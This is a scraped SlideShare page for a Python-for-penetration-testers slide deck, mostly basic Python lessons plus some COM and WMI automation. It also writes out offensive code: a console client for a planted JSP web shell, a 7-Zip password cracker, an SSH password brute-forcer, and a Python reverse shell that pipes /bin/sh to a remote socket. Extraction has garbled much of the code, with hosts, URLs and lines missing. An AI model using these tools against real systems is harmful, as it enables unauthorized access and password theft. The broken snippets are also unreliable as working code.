Python for Penetration testers


Published on

Quick presentation on how a penetration tester can start using Python to automate many of the task, create new tools, etc. For my colleagues..

Published in: Technology
1 Comment
  • Thank you man this pdf help me to perfect my python code !
    Are you sure you want to  Yes  No
    Your message goes here
No Downloads
Total Views
On Slideshare
From Embeds
Number of Embeds
Embeds 0
No embeds

No notes for slide

Python for Penetration testers

  1. 1. Why?™  EASY (install, learn, code)™  Tons of libraries™  Code is easy to understand™  Multiplatform™  Good for prototyping
  2. 2. History™  Conceived in late 80´s and first implementation in 1989™  Created by Guido Van Rossum™  Benevolent Dictator for Life™  Actually there are two branches 2.x and 3.0
  3. 3. Python 101™  Interpreted language™  Object oriented™  Indentation is significant in Python, block delimiter.™  Usual control structures (if, while, etc)™  Multiple levels of organization (function, classes, modules, packages)
  4. 4. Who is using Python?™  Core Impact ™  ImmunityDebugger™  Canvas ™  Peach™  W3AF ™  Sulley™  Sqlmap ™  Paimei™  Impacket ™  Scapy™  Google ™  Spike Proxy
  5. 5. Python 101Data types: ™  Strings - “Hello” ™  Numbers - 123 ™  Lists – [‘hello’,’2’,’1’] ™  Tuples - (‘1’,’2’,’3’) (immutable) ™  Dictionaries – d = {‘key1’:’dog’,’key2’:’cat’}
  6. 6. Python 101Structures:list=[1,2,3,4,5] if 3 > x: print “ 3 is bigger than” + x for x in list: else: print x print “ 3 is smaller than” + x
  7. 7. Python 101Example Hello World: print “Hello World” With variables: msg=“Hello World” print msg
  8. 8. Python 101™  Interactive python shell™  The commands execute line per line as you type™  Good for testing small pieces of code as loops, regex, etc™  Type “python” and enter to access the shell
  9. 9. Python 101™  Strings starts counting in 0 and can have also negative indexes™  msg[0] is H™  msg[-1] is d
  10. 10. Basic Code bitsimport sysofile = ”names.txt”fil = open(ofile,w’)x = fil.readlines()for y in x: print y
  11. 11. Urllib2™  Library to deal with HTTP import urllib2 response = urllib2.urlopen( html = print html
  12. 12. Basic fuzzerimport sys, urllib2 ofile = ”dirs.txt” fil = open(ofile,w) dirs = fil.readlines() for x in dirs: response = urllib2.urlopen(’+x) html =
  13. 13. Encodingimport base64 string=“TEST” base64.standard_b64encode(string) VEVTVA== import hashlib’) m.update(string) res = m.hexdigest() print res 033bd94b1168d7e4f0d644c3c95e35bf
  14. 14. Generic Console for Web Remote Executionimport httplib, urllib, sys host=”XXXXXXXXXX” while 1: cmd=raw_input("Exploited@"+host+"#>") if cmd=="exit": sys.exit() else: h = httplib.HTTP(host) cmd=urllib.quote(cmd) print cmd h.putrequest(GET,”/myconsole123/my-shell.jsp?pass=1231&cmd="+cmd) h.putheader(Host, host) h.putheader(User-agent, Internet Explorer 6.0 ) h.endheaders() returncode, returnmsg, headers = h.getreply()
  15. 15. 7 Zip Crackerimport os, sys, pylzma from py7zlib import Archive7z, NoPasswordGivenError, WrongPasswordError pas = open(passwords.txt, rb) password=pas.readlines() for x in password: try: fp = open(test.7z, rb) archive = Archive7z(fp, password=x) print ”The password is" + x sys.exit() except Exception, e: fp.close()
  16. 16. A Web browser#!/usr/bin/env python import sys from PyQt4.QtCore import * from PyQt4.QtGui import * from PyQt4.QtWebKit import * app = QApplication(sys.argv) web = QWebView() web.load(QUrl("")) sys.exit(app.exec_())
  17. 17. One line Webserver™  python -m SimpleHTTPServer 8080
  18. 18. SSH Bruteforcert = paramiko.Transport(hostname)try: t.start_client()except Exception: x=0try: t.auth_password(username=username,password=passw)except Exception: x=0if t.is_authenticated(): print “Password found “ + passw
  19. 19. Proxy Strike Deflate Patch™  Pd contains the POST DATA in the repeat function: import zlib defla= zlib.compress(pd)
  20. 20. Reverse Shellimport socket,subprocess,oss=socket.socket(socket.AF_INET,socket.SOCK_STREAM)s.connect(("",1234))os.dup2(s.fileno(),0)os.dup2(s.fileno(),1)os.dup2(s.fileno(),2)["/bin/sh","-i"])
  21. 21. Win32Com™  Library that allows us to access COM objects in Win32 systems™  We can automate Word, Excel, Powerpoint, access WMI, AD, etc
  22. 22. Massive printingfrom win32com import clientimport timeword = client.Dispatch("Word.Application”)def printPDFDocument(filename): word.Documents.Open(filename) word.ActiveDocument.PrintOut() time.sleep(5) word.ActiveDocument.Close() word.Quit()printPDFDocument("c:test.doc")
  23. 23. Excel Processingfrom win32com.client import Dispatch xlApp = Dispatch("Excel.Application") xlApp.Visible = 1"test.xls") for x in range(1,100): nombre=str(xlApp.ActiveSheet.Cells(x,5)) print nombre xlApp.Quit()
  24. 24. WMIimport wmic = wmi.WMI ()for process in c.Win32_Process (): print process.ProcessId, process.Name
  25. 25. Interesting stuff™™
  1. A particular slide catching your eye?

    Clipping is a handy way to collect important slides you want to go back to later.